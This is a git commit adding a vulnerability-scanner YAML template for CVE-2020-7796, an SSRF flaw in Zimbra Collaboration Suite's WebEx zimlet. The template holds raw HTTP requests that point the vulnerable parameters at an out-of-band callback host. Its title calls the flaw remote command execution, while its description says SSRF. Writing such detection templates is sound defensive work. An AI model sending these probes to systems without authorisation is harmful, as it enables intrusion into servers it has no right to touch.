Create CVE-2020-7796.yaml

Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-08-03 09:31:23 +09:00 · 2021-08-03 09:31:23 +09:00 · 9c16967fa5
parent 4e026979a9
commit 9c16967fa5
1 changed files with 33 additions and 0 deletions
--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@ -0,0 +1,33 @@
+id: CVE-2020-7796
+
+info:
+  name: Zimbra Collaboration Suite (ZCS) - Unauthenticated Remote Command Execution
+  author: gy741
+  severity: critical
+  description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
+  reference: |
+    - https://www.adminxe.com/2183.html
+  tags: cve,cve2020,zimbra,rce,oob
+
+requests:
+  - raw:
+      - |
+        GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
+        Host: {{Hostname}}
+        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+        GET /ervice/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
+        Host: {{Hostname}}
+        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"